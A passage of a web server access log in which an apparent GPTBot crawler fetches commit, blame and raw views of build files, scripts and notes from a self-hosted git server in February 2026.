38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/update_status.py" +[17/Feb/2026:16:23:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_delete/main/.Backup/update_status.py" +[17/Feb/2026:16:23:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/cpp/Makefile" [Client 74.7.227.38] [Length 17037] [Gzip 5.66] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/cpp" +[17/Feb/2026:16:23:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/cpp/Makefile" [Client 74.7.227.38] [Length 17039] [Gzip 5.66] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/cpp" +[17/Feb/2026:16:23:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/cpp/CMakeFiles" [Client 74.7.227.38] [Length 10222] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/cpp/CMakeFiles" +[17/Feb/2026:16:23:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/cpp/CMakeFiles/CMakeDirectoryInformation.cmake" [Client 74.7.227.38] [Length 11896] [Gzip 3.36] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/cpp/CMakeFiles" +[17/Feb/2026:16:23:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/cpp/cmake_install.cmake" [Client 74.7.227.38] [Length 12992] [Gzip 3.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/cpp" +[17/Feb/2026:16:23:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/cpp/libcomm_core.so" [Client 74.7.227.38] [Length 11010] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/cpp" +[17/Feb/2026:16:23:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/cpp/libcomm_core.so" [Client 74.7.227.38] [Length 11011] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/cpp" +[17/Feb/2026:16:23:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/cpp/cmake_install.cmake" [Client 74.7.227.38] [Length 12993] [Gzip 3.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/cpp" +[17/Feb/2026:16:23:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/cpp/CMakeFiles/CMakeDirectoryInformation.cmake" [Client 74.7.227.38] [Length 696] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/cpp/CMakeFiles/CMakeDirectoryInformation.cmake" +[17/Feb/2026:16:23:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/cpp/CMakeFiles/CMakeDirectoryInformation.cmake" [Client 74.7.227.38] [Length 11086] [Gzip 3.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/cpp/CMakeFiles/CMakeDirectoryInformation.cmake" +[17/Feb/2026:16:23:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/cpp/CMakeFiles/CMakeDirectoryInformation.cmake" [Client 74.7.227.38] [Length 10009] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/cpp/CMakeFiles/CMakeDirectoryInformation.cmake" +[17/Feb/2026:16:23:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/cpp/Makefile" [Client 74.7.227.38] [Length 9981] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/cpp/Makefile" +[17/Feb/2026:16:23:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/cpp/Makefile" [Client 74.7.227.38] [Length 9979] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/cpp/Makefile" +[17/Feb/2026:16:23:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/cpp/Makefile" [Client 74.7.227.38] [Length 17964] [Gzip 11.36] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/cpp/Makefile" +[17/Feb/2026:16:23:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/cpp/CMakeFiles/CMakeDirectoryInformation.cmake" [Client 74.7.227.38] [Length 696] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/cpp/CMakeFiles/CMakeDirectoryInformation.cmake" +[17/Feb/2026:16:23:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/cpp/CMakeFiles/CMakeDirectoryInformation.cmake" [Client 74.7.227.38] [Length 11084] [Gzip 3.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/cpp/CMakeFiles/CMakeDirectoryInformation.cmake" +[17/Feb/2026:16:23:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/cpp/CMakeFiles/CMakeDirectoryInformation.cmake" [Client 74.7.227.38] [Length 10010] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/cpp/CMakeFiles/CMakeDirectoryInformation.cmake" +[17/Feb/2026:16:23:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/cpp/libcomm_core.so" [Client 74.7.227.38] [Length 70934] [Gzip 29.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/cpp/libcomm_core.so" +[17/Feb/2026:16:23:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/cpp/Makefile" [Client 74.7.227.38] [Length 17967] [Gzip 11.36] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/cpp/Makefile" +[17/Feb/2026:16:23:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/cpp/Makefile" [Client 74.7.227.38] [Length 7439] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/cpp/Makefile" +[17/Feb/2026:16:23:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/cpp/cmake_install.cmake" [Client 74.7.227.38] [Length 14156] [Gzip 5.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/cpp/cmake_install.cmake" +[17/Feb/2026:16:23:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/cpp/cmake_install.cmake" [Client 74.7.227.38] [Length 10231] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/cpp/cmake_install.cmake" +[17/Feb/2026:16:23:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/cpp/Makefile" [Client 74.7.227.38] [Length 7439] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/cpp/Makefile" +[17/Feb/2026:16:23:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/cpp/libcomm_core.so" [Client 74.7.227.38] [Length 10233] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/cpp/libcomm_core.so" +[17/Feb/2026:16:23:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/cpp/cmake_install.cmake" [Client 74.7.227.38] [Length 1571] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/cpp/cmake_install.cmake" +[17/Feb/2026:16:23:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/cpp/libcomm_core.so" [Client 74.7.227.38] [Length 70931] [Gzip 29.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/cpp/libcomm_core.so" +[17/Feb/2026:16:23:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/cpp/libcomm_core.so" [Client 74.7.227.38] [Length 45072] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/cpp/libcomm_core.so" +[17/Feb/2026:16:23:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/cpp/libcomm_core.so" [Client 74.7.227.38] [Length 45072] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/cpp/libcomm_core.so" +[17/Feb/2026:16:23:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/cpp/cmake_install.cmake" [Client 74.7.227.38] [Length 14155] [Gzip 5.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/cpp/cmake_install.cmake" +[17/Feb/2026:16:23:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/cpp/cmake_install.cmake" [Client 74.7.227.38] [Length 10231] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/cpp/cmake_install.cmake" +[17/Feb/2026:16:23:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/cpp/cmake_install.cmake" [Client 74.7.227.38] [Length 1571] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/cpp/cmake_install.cmake" +[17/Feb/2026:16:23:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/cmake_install.cmake" [Client 74.7.227.38] [Length 15181] [Gzip 6.70] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/cmake_install.cmake" +[17/Feb/2026:16:23:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/cmake_install.cmake" [Client 74.7.227.38] [Length 2381] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/cmake_install.cmake" +[17/Feb/2026:16:24:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/cpp/CMakeLists.txt" [Client 74.7.227.38] [Length 295] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/cpp/CMakeLists.txt" +[17/Feb/2026:16:24:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/cpp/CMakeLists.txt" [Client 74.7.227.38] [Length 295] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/cpp/CMakeLists.txt" +[17/Feb/2026:16:24:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/cmake_install.cmake" [Client 74.7.227.38] [Length 15179] [Gzip 6.70] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/cmake_install.cmake" +[17/Feb/2026:16:24:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/cmake_install.cmake" [Client 74.7.227.38] [Length 2381] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/cmake_install.cmake" +[17/Feb/2026:16:24:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/branch/main/.Backup/update_status.py" [Client 74.7.227.38] [Length 1390] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/update_status.py" +[17/Feb/2026:16:24:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/rss/branch/main/.Backup/update_status.py" [Client 74.7.227.38] [Length 824] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/update_status.py" +[17/Feb/2026:16:24:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/branch/main/OpcUaMinimal" [Client 74.7.227.38] [Length 10748] [Gzip 3.12] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver" +[17/Feb/2026:16:24:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/branch/main/Dockerfile" [Client 74.7.227.38] [Length 11053] [Gzip 3.69] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/Dockerfile" +[17/Feb/2026:16:24:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e?files=GoldMonitor%2fbuild%2fGoldMonitor_V5.2%2flocalpycs%2fstruct.pyc" [Client 74.7.227.38] [Length 23813] [Gzip 4.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.2/localpycs/struct.pyc" +[17/Feb/2026:16:24:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e?files=GoldMonitor%2fbuild%2fGoldMonitor_V5.1%2flocalpycs%2fstruct.pyc" [Client 74.7.227.38] [Length 23806] [Gzip 4.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.1/localpycs/struct.pyc" +[17/Feb/2026:16:24:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e?files=GoldMonitor%2fbuild%2fGoldMonitor_V5.3%2flocalpycs%2fstruct.pyc" [Client 74.7.227.38] [Length 23810] [Gzip 4.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.3/localpycs/struct.pyc" +[17/Feb/2026:16:24:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/index.html?display=rendered" [Client 74.7.227.38] [Length 10879] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/index.html" +[17/Feb/2026:16:24:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/controller-next-todo.md?display=source" [Client 74.7.227.38] [Length 13234] [Gzip 4.21] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/controller-next-todo.md" +[17/Feb/2026:16:24:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/controller-next-todo.md?display=source" [Client 74.7.227.38] [Length 13231] [Gzip 4.21] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/controller-next-todo.md" +[17/Feb/2026:16:24:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr 